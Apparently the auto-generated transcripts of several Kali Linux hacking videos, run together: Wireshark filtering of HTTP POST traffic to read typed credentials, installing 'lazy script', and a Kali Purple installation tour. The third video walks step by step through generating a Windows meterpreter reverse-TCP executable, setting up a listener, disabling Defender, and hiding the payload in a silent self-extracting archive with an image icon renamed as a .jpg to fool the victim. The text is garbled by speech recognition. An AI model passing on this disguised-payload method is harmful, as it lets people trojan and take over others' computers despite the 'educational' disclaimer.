I will type the request method, and you can do dash get. Get is like the connection request. If you don't know about that, the request is about the connection. So get do the, if you want to filter packets captured by the Wireshark with the HTTP request, right? The method will be the get, or either should be post or head or options, put, delete, whatever it is. So for now, I will do the get, and once we do get, you will see the cool things on it. See right here, this is the connection. Actually index.php is requested with the following things. Now this is, you can see, okay, this is the connection getting, right? Now what we can see right here is you can see the lot of things right here. This is the acknowledgement and timestamp, acknowledge analyst, so on right here. So the Firefox, whatever it is. Now I will say the post. Once we do the post, the only we can see here is the password and the username, what we type in this one, right? Let's do that. Let's see it. Now the cool thing right here is about this. So right here, so HTML form URL encoded, and this is the admin and password, that what we type here. Also you can do, if you don't really want to do that, you can flow the TCP string, HTTP. So that's exactly whatever we put for here, we will see the connection and HTTPS request. And if you see right here, admin and the password is this. Without being said, there are a lot of things on the Wireshark. If you want to new video, please subscribe my channel, like, share. Thank you for watching, and I will see you in my next video. In this video, I'm gonna show you how you can install the lazy script and how you can use it in Kali Linux. What is the lazy script? What's the purpose of using it? So the lazy script is designed to help you to save time and work, install different hacking tools easily with just a few minutes, saving a lot of time of your, to help in the way all the manual tasks are avoided. The purpose of this script is you have all the options in a single terminal with a number, and it will start working to make easy without opening a multiple terminal. Trust me, this script will make your life easier and of course fast. This script is whoever wants to type less and do more work. Alright, so before beginning, if you are new to my channel, please don't forget to subscribe, like, and share my video. Please remember, this video content has been created educational purpose only. I, and script creator, is not responsible how you use this tool. Okay, so let's go ahead and open the terminal. Once you open the terminal, you have to open as a root. So first thing, who am I open the terminal as a root right here, and you have to open the browser. Once you open the browser, make sure you have internet. So, and then type, you have to Google it, google.com, and type lazy script. So once you open the lazy script, click on this one, the first one, and I will copy from here. I will put this link in my description, so you'll grab from there. Once you copy, once you open this one, you have to click on code and copy and minimize this one. You have to go git clone and paste this, hit enter. So while you are copying this one, please make sure you are in the root privilege. If you are using normal user, make sure you are in root. So once you cloning the script folder, so you have to go cd ls script, do ls, and you will see all those things. Okay, and also what you have to do, there is you can see how you can install on this one, so you have to do all those things. I'll put this link in my description below, so you'll able to get it. Okay, so minimize this. I will say csmod and plus x is to install assets. Now we have in executive mode right here, so do this one, install sh, and press any key to install. Okay, I'll press any key, and it will start installing the program. This one is really dependent upon your internet speed, so alright, so this is the step where you can install the script. So if you're updating the script, you have to type U for updating or installing for I. So this is my first time I'm installing, so press I and hit enter. So you need to accept the terms, press any key and then type yes. So basically what it says is you will use this tool for your own network, so it's not for the other, so be mindful of that one. If you type yes, hit enter, and you can close the background. And in this section you have to choose the WAN settings. You have to open this terminal and ifconfig. This is the WAN for me, and paste it here. And please make sure your wireless interface is in monitor mode. If you don't want to put anything, just hit enter. It doesn't really matter. For me, I am gonna use, to change this one to monitor mode, I am gonna use the command, which will be air monitor -ng and start WAN0. So basically WAN0 is my WAN interface. WAN0. So hit enter and it will stop the services and it will modify to one monitor. So let's check again. config. All right, so if you see right here, I'll put this. And again, if you don't have WAN monitor, so just hit enter without typing anything. And Ethernet 0, I'm gonna use this one. So hit enter, and then I'm done with the interface settings, and press any key to continue, and continue again. All right, there you go. Let me close this. All right, from here you can do IP config. You can also enable WAN. You can enable monitor mode. You can do whatever you want to here. So I'm gonna show you a few things here. Let me see. Number 9. Let's see number 9. Hit enter, and you'll see right here. Let's install some tools with that. Number 6. Hit enter. And what do you want to install? Anything. Let's say Angry IP. All right, let's put the Angry IP there. Number 3. And once you choose and type yes. And it will install. And once it's done, press any key, and you have to go back for B, and one more back. Let's go to 9 again, hit enter, and let's go to 1. And number 20, let's see. If you see in the red section, those are not installed, and if you see all the whites color, those are installed. So if you see, if you put 20, so see, it's so easy. So close, and you can install. You can use from now. You can change all of this, and then you can start scanning. And with that, let's see, change the other one. Let's go to number 2. And there you go. So it will scan all those things and make sure if you are okay on it. So those are all of the SSD, and if you are ready on it, so you have to Control C. I believe you understand how you can use this, and that's how you use. So I'm not gonna show you all those things, maybe it's crazy, so please cancel it. You can also open the script from the terminal. Type L is lazy, so it's so cool, right? It's so cool. Exit. Let me exit in, and exit from here too. And if you click on this and make sure you are in root privilege and type EL, and this is so cool. There are a lot of things we can do on it, so please let me know in the comment section what tools you want to use with the lazy script. I really appreciate it with the Aries, whoever create this tool. Go ahead and try, and then let me know in the comment section how it is. If you have any questions regarding to this, please comment below, and then I will answer as much as possible I can. So thank you for watching. In this video, I'm gonna show you how you can hack the Windows machine using the image file. So first thing first, if you are new to my channel, please don't forget to subscribe, like, and share my video. Remember, this video content has been created for educational purpose only. I'm using my own lab environment to demonstrate this video, and I'm not responsible how you use this tool. With that, let's jump into the video. First thing, I have Windows 11 and Kali Linux. So make sure you do have 2 machines. With that, Let's open the terminal here. Once you open the terminal, let me make it bigger. So you have to type ms venom -p. This P is for payload, and windows meter / reverse underscore TCP and equals to lhost equals to, and let's check the IP address right here. Config, and let's use this IP, paste, and after that we have to use L port equals to 8888, and you can use any port, it doesn't really matter, and F and exe, which execute file, and -o is output, home Kali Windows. So once you put the name there, you can put any name, it doesn't really matter. So I will say my puppy.exe. So because I'm using my puppy image file, reverse the interpreter. So hit enter. Once you hit enter, it will generate my puppy.exe file inside the Windows folder, whatever you created. So ms venom, P is for payload, Windows interpreter, reverse TCP, and this is our host, and this is our port, and execute files, output with this file. So once you generate this one, and we will double confirm if it's generated or not. So let's wait for like a few seconds here. Alright, so let's check cd home Kali and Windows. Let's see. So alright, so here is my puppy.exe. Once you generate this my puppy.exe or whatever name you generate right here, make sure you generate the puppy whatever name, so it doesn't really matter. Alright, so once you generate that file.exe, we have to go Windows machine, and we need to create the image file on it. So I download that my puppy.exe from that Kali Linux, and after you generate that, you have to create the icon file, and then the real, let me show you right here. So click on properties, and you'll see that JPG file, and this is the icon file. So go more options right here. So you can create icon file. You can use any icon generator. So if you Google it, you can do from there icon converter. So once you open the icon converter, you can open that image file. You can use this tool. I create this icon file from here. So I will also put this link in the description below, so you will you don't have to go back and forth. After you create the icon file, you are pretty much set. What we can do here, we need to generate the listener on the Kali. Let's do that first. Let me close this, and let's do MSF console. I need enter. Okay, once you load MS console, you have to type. So once you load the MS console, you have to type use exploit multi-handler. Okay, and once you hit multi-handler, you have to type set payload Windows, set payload Windows interpreter / reverse TCP. What you can do here, so options, and we can use lhost and lport. So lport, whatever you assign it, you have to put this one on the lport. Let's do that. Set lhost, and we have to verify our IP address. So make sure your IP address is correct and paste it here, hit enter, set lport and 8888, we use that, and close and check one more time. Okay, so we are pretty much set here. lhost is this our IP, lport is our port whatever we generated, and after that we are ready to exploit that. Once you are ready to exploit, you have to type exploit and hit enter, and we are listening right now. As soon as that image file is loaded, we will able to get MetaParaCell right here. So for that, let's go ahead and begin that. So once you run the exploit from your Kali, you have to go, you can select any image file mentioned you earlier. You can just change the image file into icon converter, and make sure your antivirus or whatever you do have. I do have Windows Defender, so I disable it. This one you can download. You can go ahead and you can just turn off from here. So manage settings, and you can just turn off from here, and once you turn off there, it's gone right here, if you see right here. So what I can do, I can just download again from that one. Whatever you generate right here is you have to copy and paste here, and once you generate the icon file, so this is the icon file whatever I created, and this is the image file. This is the image file, as you see right here, the JPG file, and this is the malicious file we generate from the Kali. So I am gonna go right click on it, and I will say load to archive and add to archive. Once you open that, you have to click on create SFX archive. Okay, so you can compress best, it doesn't really matter, but let's create that. Once you create FX file, you have to click on advanced and SFX options. You have to click on it and click on setup, and you have to copy this JPG file and copy this and put it here. .exe. Once you, and this is the my puppy file from here. So those are the two files I select from here, and once we go here, let me see, here, so SFS icon file. So once you click on text and icon, so you will able to see it. I will open that file on desktop. So this is my icon file, and click on cancel, open it, and you have to go hide all. You have to do models, hide all, and you have to click on updates. You have to do override all files. So, and once you done this one, so what we did is right here, so general, we don't have anything set up. We do have the puppy.file file, and once you click on OK, you will able to see all this one. So what we did here is create SFX archive and the best compression, and once you click on advanced, you'll see the options right here, FSX options, and we set up those two files from here, and models, hide all the payload silence mode. You don't have to, because if we display it, maybe someone caught you. And if you click on advanced, there is nothing we did. And models, we haven't done anything. We upload the icon file Once you satisfy all the settings and click on OK, and we will see the poppy.exe. So see, there's, if you right click here, you'll see the exact, what is it? So exe, right? But it's pretend that's the, we have the image file. Rename it, just rename it. Let's rename right here .jpg, right? So even doesn't know, no one knows. So this, okay, so this is the image file. Once you generate that file and once you open this file, it doesn't, it's normal. There's nothing you will see, nothing you will do. You don't have capability to do it. But the user say, oh, okay, that's a little funny, okay. So but in the real time, we get the MetaProtect cell right here. So we can do ipconfig. So this is the ipconfig for this file. So if you see right here, so that's how we will able to generate the MetaProtect. 129 IP, you will see right here 120. So you can also do cell, so do who am I? So I am the administrator. So this is how we will do it. So this is so easy. So, and again, please remember that this video content has been created for educational purpose only. I'm using my own lab environment to demonstrate, and I'm not responsible how you use this tool. In this video, I'm going to talk about the Kali 2023.1 release, which is Kali Purple. There is a few Python changes, so you need to know about this. As you know, Monday 13 March 2023, Kali Linux 2023.1 release with the Kali Purple, and there are few Python changes. Why Kali released this? Because Kali Monday 13 March 2023 is the 10th anniversary of the Kali Linux. So that's why they released the Kali Purple for the, if you see, there are a few changes they make. Let me make it a little bigger for you. So if you want to learn about these QE things, you can go to github.lab.com and there will be an official link, and also I will put this link in the description below. Kali released the purple one because this is the defensive security. What did we decade ago with the Kali Linux or Blacktrack? If you don't know about the Blacktrack merged with the Kali. They start building the Kali, they merge with the Kali. So that's why they, nowadays there's no Blacktrack. So way back, so there was a Blacktrack, and that's why, so they're trying to doing few things with the purple one. So 100 of defensive tools such as Alchemy full package capture, Cybersecurity, GVM vulnerability scan, the Hive, Malcolm, Jack ID. There are so many tools. Also, you can see defensive menu starting according to NIST and CFS. So identify, protect, detect, response, and recover. So there are a lot of things you can read through this article, and there's also few graphics they change it. So if you see right here, Malcolm, if you see the graphics things, you can just go to here. Here's the start menu. This is what I liked it. So this is the start menu, and they define, identify, protect, detect, response, recover, so on tools. So as you know, Kali is always, you can customize everything. Like if you want to install anything on it, so you can always go to GitHub repository and you can download from there. Also, if you want anything installed, you can directly install from the Kali repository. And also, Kali Purple is down to new era. Kali is not only offensive but starting to be defensive. So that's why they start doing for the Kali Purple. As you know, there are few Python chains, and they also build the 2023 themes, desktop updated, default kernel settings, new tools, and so on. So Kali Purple is also very cool with the graphics. So I already downloaded the ISO for Kali Purple, so I'll also put you link in the description so you directly download from there. So if you see right here, so ISO Kali Purple, you can just directly go here and download from the Kali. So this is the few images. If you go, this is the regular image, this is Kali purple. So if you want to go with the documentation, you can just right click and you can go to the same where I open this one. Okay, so now once you download this Kali purple, you can upload to the VM, so which is I already download and uploaded for here. I will show you few things about this Kali, how it was and how we can go through. So let me install. All right, so graphic install. All right, I want to install graphic install. All right, so this is the cool things about this Kali. So this is the purple already. So if you see right here, so this is really cool. I will continue United States, okay. English, okay. I will go to that. I detected the mount installation media, so that's okay. So everyone is talking about the Kali purple. What is Kali purple? This is like a cool things about this one. That's why I'm just testing right now to show you how it works actually. So that's why I'm just curious that this is very interesting. So while installing right here, we can also see few other things with the, this is elastic. Okay, so what is this mean? So this is the purple. You can just customize everything if you want to go. So here's the overview of this one. If you want to like tune a little bit, deep dive into on it. So here's the Kali and then installation, OpenCTI, GVM, a lot of things right here. So I'm just curious that what is it. So you can install this RSYS-LOG. Okay, so that means you can syslog from here. You can also do that. And this is a project installation, so on. So we will walk through everything, whatever it is. Okay, so Kali purple installation, firewall settings, so on. So let's see what's going on. So I will put the default for the Kali here, and domain name will be nothing, and I will put the SpyCyber. Continue. I will use the SpyCyber, and I will also put the SpyCyber or Kali. So I'm using Kali for here, and I'm in Pacific time. All right, so I will go through the guided one, so I don't want to waste your time. I'll continue, and all files, continue. Finish partition, continue, yes, continue. I'm just going to yes because this is so, if you want to build purple one, you can always go through and check your requirement. Okay, I just want to test how it works. So that's why I'm just clicking next. If you want to really install on your virtual machine and test it, if you check your requirement to your computer and make your thought and then install it. So while waiting here, we also see the few things here. So if you see right here, this is the autopilot. Autopilot is really cool also. So right here, if you see the purple SOC in the box reference architecture, if you want to see details about it, so you can just see the Kali purple, how it goes through this. You can define a lot of things here, but I'm not gonna show you all of this here. These are the things right here, Kali purple. This is the enumeration, everything is here, and so on. So this is really exciting. So let's see other thing here, detects, installation, firewall. Okay, let's go to here, what it says. Okay, so create a structure and server VLAN. This is so really cool. I really like it. I really want to test on this one, how it works. I'm just curious that how it really install and how it be cool, right? So here's the, everything is installation, right? So you as you see, like this is the defensive, so it will really interesting if you install everything on it. So this is really interesting. So recover, what is that? Other. Okay, so what is this? Halotropy installation. So you can create a VM. I mean, you can play around. What is it? So this is really cool. While installing, I just want to show you. All right, so as you know that this is the cool part, right? So you can install XFCE, Gmon, identify, protect is this is really cool, interesting, right? So this is the identify, protect, detects, response, recover. So that's what, if you see right here, so it says, hey, identify, protect, detect, response, and this is the tools right here. So it's trying to install. Let me try to install all of them. Okay, so let's wait for it. I'm really interested how the Python works though. This is really interesting. So you can also configure this with the network right here. So Kali Purple with the no VNC. So see right here, so this is really cool, right? This is interesting. This is really interesting. If you really wants to test it, you can just go ahead and try it. So this is really cool. I really like it. So because this is, the color is so cool. And if you see right here, if you don't want to install anything like identify, product, anything, you can uncheck it. You can just uncheck and install and continue. So that's how it will, like, if you don't want to graphical, so this will be the really cool things right here. So if you see sudo vi etc default grp, so this will be really interesting. So let's wait for installation. Let's wait. Let me see any issue, if there is something issue right here. So let's see what it says. Okay, Kali Purple documentation doesn't clear align with the overview page. Okay, so side menus. Okay, so 3 days ago, which is good. I mean, if you want to, if you find something, this is the contribution, right? So everything, whatever you find, whatever you realize, just contribute to the people or the community. So that's how you will grow, your community will grow, and everyone will grow. The overview page is screenshot of the Kali Purple application menu several. Okay, so this is the really cool though. So this is like a Kali autopilot crack map x not installed. All right. So I mean, we can install it, doesn't really matter though. We can install it. It doesn't hurt if we install it, right? This will really depend upon your internet speed and your computer processor and memory. So you have to be very patient while installing. So if you are new to my channel, please don't forget to subscribe, like, and share. That's how I will bring you more new videos in this channel. All right, installation has been completed almost. All right, so let's go to continue and enter manually. No, I don't want to install manually. Finishing the installation. Even though it's like a VM tools desktop is automatically installing, so which is cool. I mean, installation has been completed, and let's reboot. I like really this one. So GUI. All right, so spy, cyber, and Kali. All right, so this is really cool. All right, I'm really excited. So let's see. Okay, so identify, there are a ton of tool. Source exploit, oh my god. All right, so JAP. Okay, so JAP is also one of the most popular tool. Tiger, Cisco auditing tool, protect, crypt setup, firewall, builder, detection, so on, right? So there are a lot of tons of tools. Wireshark is already installed, Yara is installed. Oh my god, everything installed. All right. So, and then this is the basic forensic, like there's the tools, they're already there. So this is the, I'm not really excited about this one, but I'm really excited about this. So that's what I just want to show you how this actually inbuilt on this Kali. So let's see, let's try to do one thing. So let's try to open the terminal from the keyboard. Control Alt T. Okay, so Control Alt T is there. Okay, so you can also zoom the terminal. Control Alt Shift plus. You can also click from here, and you can do that too. And let's try to do GSS is still they're using the GSS, which is cool though. So let's try to do, so what about if I do /etc, hit enter. Okay, so it is still something. You don't have to type cd though. And let's try to sudo apt update. All right, so okay, so it's still update is there, which is cool. And you can also try sudo apt upgrade. Try one thing, grip. Okay, so it's still grip is there, so you can still use it. And what about the splitting? Okay, so you can also split the terminal. Okay, virtual, vertical, horizontal. What about if I close here? Okay, so still I can close from here, which is good. Control Alt plus, Control Alt minus. Okay, you can do minus. Okay, so only plus. Okay, this is really cool though. So this is the shortcut they try to put everything. So this is also a vulnerable cool thing. Kali forms, Kali Linux, Kali tools, NetHunt, offset training, FernHub, etc. So what about the settings? So setting is also there. You can also use a lot of things. So now I'm not gonna go ahead and install this, but okay, you can install this. You can go ahead and try install. Okay, if you want to PVE, so you can just download from the image file. You can just try from here. So you can always like install, remove the packages. Okay, you can try everything from here. So I'm not gonna show you everything. If I go to back overview, there's a few things. Kali purple, you do you. So Kali purple, so practice OPS, virtualization, firewall, VLANs, WF, ID, IDS, IPS, practice red, pen testing, vulnerability machines, all on this one. So as you see right here, so that's why they deploy the Kali purple on this one. So if you see, this is architects, as I told you earlier. So, and also this is the vulnerable machines, which is virtual, and you can see, you can install all of these tools. So if you see right here, the DVA DAM vulnerability, so also this is the cool one. And there's like a green bone. So this is a lot of things. I'm really excited. And as I told you, if you want to test any like tools, let me know in the comment section, and then I'll try my best to deliver to you. I hope you like this video. Please comment below how you like it. If you have any questions, please let me know, and then I will help you to answer them. So if you are new to my channel, please don't forget to subscribe, like, and share.